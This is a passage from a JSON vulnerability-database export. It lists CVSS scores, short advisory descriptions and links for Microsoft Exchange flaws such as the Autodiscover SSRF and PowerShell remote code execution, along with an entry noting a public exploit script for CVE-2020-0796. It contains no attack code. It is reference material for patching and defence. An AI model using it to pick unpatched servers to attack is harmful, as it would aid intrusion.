"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:18:47", "description": "# Contains Custom NSE scripts \n\n\n# CVE-2020-0796\nNSE script to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
6.0}, "published": "2020-03-11T17:51:29", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-34473"], "modified": "2022-03-23T17:15:09", "id": "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cnvd": [{"lastseen": "2022-10-11T00:07:43", "description": "Microsoft Exchange Server is a popular mail service program developed by Microsoft. 
Microsoft Exchange Server is vulnerable to an elevation of privilege vulnerability, which can be exploited by remote attackers to submit special requests that can obtain sensitive information or elevate privileges.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T00:00:00", "type": "cnvd", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability (CNVD-2022-67837)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-10T00:00:00", "id": "CNVD-2022-67837", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-67837", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T00:08:42", "description": "Microsoft Exchange Server is a popular mail service program developed by Microsoft. 
Microsoft Exchange Server has a security vulnerability that can be exploited by remote attackers to submit special requests that can execute arbitrary code via PowerShell in the context of an application.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T00:00:00", "type": "cnvd", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability (CNVD-2022-67838)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-10T00:00:00", "id": "CNVD-2022-67838", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-67838", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2023-09-04T19:21:57", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41040", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41040", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-09-04T19:21:57", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41082", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31206", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:29", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": 
"Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31196", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-05-23T15:49:57", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Autodiscover service. The issue results from the lack of proper validation of URI prior to accessing resources. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Exchange Server Autodiscover Server Side Request Forgery Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-07-19T00:00:00", "id": "ZDI-21-821", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-821/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-11T22:15:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the FileConfigurationSource class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange FileConfigurationSource Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1637", "href": 
"https://www.zerodayinitiative.com/advisories/ZDI-22-1637/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:17:46", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the G711Reader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange G711Reader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1630", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1630/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:15:57", "description": "This vulnerability allows remote attackers to 
disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the DumpDataReader class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange DumpDataReader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1638", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1638/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:15:07", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the DbgEngDataReader class. 
The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange DbgEngDataReader Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1643", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1643/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:17:57", "description": "This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the GsmWriter class. The issue results from the exposure of a dangerous function. 
An attacker can leverage this vulnerability to create a denial-of-service condition on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange GsmWriter Exposed Dangerous Function Denial-of-Service Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1629", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1629/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T22:18:25", "description": "This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the MsgStorageWriter class. The issue results from the exposure of a dangerous function. 